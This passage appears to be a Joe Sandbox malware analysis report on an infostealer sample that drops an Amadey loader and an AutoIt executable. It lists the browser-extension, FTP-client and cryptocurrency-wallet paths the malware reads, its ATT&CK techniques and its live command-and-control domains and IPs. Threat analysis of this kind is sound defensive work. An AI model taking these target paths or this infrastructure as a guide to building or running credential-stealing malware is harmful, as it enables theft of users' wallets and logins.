        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        2
        OS Credential Dumping
        13
        File and Directory Discovery
        Remote Services11
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts12
        Process Injection
        11
        Deobfuscate/Decode Files or Information
        11
        Input Capture
        227
        System Information Discovery
        Remote Desktop Protocol31
        Data from Local System
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter
        Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        Security Account Manager1051
        Security Software Discovery
        SMB/Windows Admin Shares11
        Input Capture
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        PowerShell
        Login HookLogin Hook12
        Software Packing
        NTDS13
        Process Discovery
        Distributed Component Object Model1
        Clipboard Data
        115
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets461
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
        Masquerading
        Cached Domain Credentials1
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items461
        Virtualization/Sandbox Evasion
        DCSync1
        Remote System Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581585 Sample: vUcZzNWkKc.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 41 spuriotis.click 2->41 43 yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 12 other signatures 2->59 9 vUcZzNWkKc.exe 4 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\Temp\Set-up.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\...\PasoCattle.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\...\vUcZzNWkKc.exe.log, CSV 9->39 dropped 71 Detected unpacking (changes PE section rights) 9->71 73 Tries to detect sandboxes and other dynamic analysis tools (window names) 9->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->75 77 5 other signatures 9->77 13 PasoCattle.exe 19 9->13         started        15 Set-up.exe 9->15         started        signatures6 process7 dnsIp8 19 cmd.exe 2 13->19         started        47 home.fortth14ht.top 194.87.58.92, 49732, 49739, 49740 RELCOM-ASRelcomGroup19022019RU Russian Federation 15->47 49 httpbin.org 3.218.7.103, 443, 49730 AMAZON-AESUS United States 15->49 51 Multi AV Scanner detection for dropped file 15->51 signatures9 process10 file11 33 C:\Users\user\AppData\Local\...\Climb.com, PE32 19->33 dropped 61 Drops PE files with a suspicious file extension 19->61 23 Climb.com 19->23         started        27 cmd.exe 2 19->27         started        29 extrac32.exe 13 19->29         started        31 8 other processes 19->31 signatures12 process13 dnsIp14 45 spuriotis.click 172.67.128.184, 443, 49737, 49741 CLOUDFLARENETUS United States 23->45 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->63 65 Query firmware table information (likely to detect VMs) 23->65 67 Tries to harvest and steal ftp login credentials 23->67 69 3 other signatures 23->69 signatures15

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        vUcZzNWkKc.exe47%ReversingLabs
        vUcZzNWkKc.exe31%VirustotalBrowse
        vUcZzNWkKc.exe100%AviraHEUR/AGEN.1313526
        vUcZzNWkKc.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\768400\Climb.com0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\PasoCattle.exe11%ReversingLabs
        C:\Users\user\AppData\Local\Temp\Set-up.exe70%ReversingLabsWin32.Trojan.Amadey
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1100%Avira URL Cloudmalware
        http://home.fortth14ht.top/nTrms100%Avira URL Cloudmalware
        http://home.fortth14ht.top/nTrm100%Avira URL Cloudmalware
        https://spuriotis.click/api0%Avira URL Cloudsafe
        spuriotis.click0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        spuriotis.click
        172.67.128.184
        truetrue
          unknown
          home.fortth14ht.top
          194.87.58.92
          truefalse
            high
            httpbin.org
            3.218.7.103
            truefalse
              high
              yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                scentniej.buzzfalse
                  high
                  http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0false
                    high
                    http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003false
                      high
                      hummskitnj.buzzfalse
                        high
                        rebuildeso.buzzfalse
                          high
                          appliacnesot.buzzfalse
                            high
                            screwamusresz.buzzfalse
                              high
                              cashfuzysao.buzzfalse
                                high
                                inherineau.buzzfalse
                                  high
                                  https://spuriotis.click/apitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://httpbin.org/ipfalse
                                    high
                                    prisonyfork.buzzfalse
                                      high
                                      spuriotis.clicktrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://html4/loose.dtdvUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabClimb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.sectigo.com0vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                              high
                                              http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKSSet-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://.cssvUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                        high
                                                        https://www.autoitscript.com/autoit3/Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drfalse
                                                          high
                                                          https://curl.se/docs/hsts.htmlSet-up.exe.0.drfalse
                                                            high
                                                            http://home.fortth14ht.top/nTrmsSet-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiClimb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.c.lencr.org/0Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallClimb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchClimb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://home.fortth14ht.top/nTrmSet-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allClimb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://.jpgvUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                          high
                                                                          https://sectigo.com/CPS0vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                            high
                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgClimb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoClimb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://curl.se/docs/http-cookies.htmlvUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                  high
                                                                                  http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13Set-up.exe.0.drfalse
                                                                                    high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaClimb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.autoitscript.com/autoit3/XClimb.com, 0000000D.00000000.1778645855.0000000000AF5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.drfalse
                                                                                            high
                                                                                            http://ocsp.rootca1.amazontrust.com0:Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://nsis.sf.net/NSIS_ErrorErrorvUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000001.00000000.1712224288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drfalse
                                                                                                  high
                                                                                                  https://curl.se/docs/alt-svc.htmlSet-up.exe.0.drfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brClimb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://ac.ecosia.org/autocomplete?q=Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tvUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                                                            high
                                                                                                            https://httpbin.org/ipbeforevUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                                              high
                                                                                                              https://www.amazon.com/?tagClimb.com, 0000000D.00000003.2239939802.0000000003C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgClimb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.drfalse
                                                                                                                    high
                                                                                                                    https://support.microsofClimb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesClimb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            172.67.128.184
                                                                                                                            spuriotis.clickUnited States
                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                            194.87.58.92
                                                                                                                            home.fortth14ht.topRussian Federation
                                                                                                                            2118RELCOM-ASRelcomGroup19022019RUfalse
                                                                                                                            3.218.7.103
                                                                                                                            httpbin.orgUnited States
                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1581585
                                                                                                                            Start date and time:2024-12-28 09:32:18 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 7m 23s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:vUcZzNWkKc.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:2882ead03a58608f2f73c66b861299a3.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@28/23@10/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 33.3%
                                                                                                                            HCA Information:Failed
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
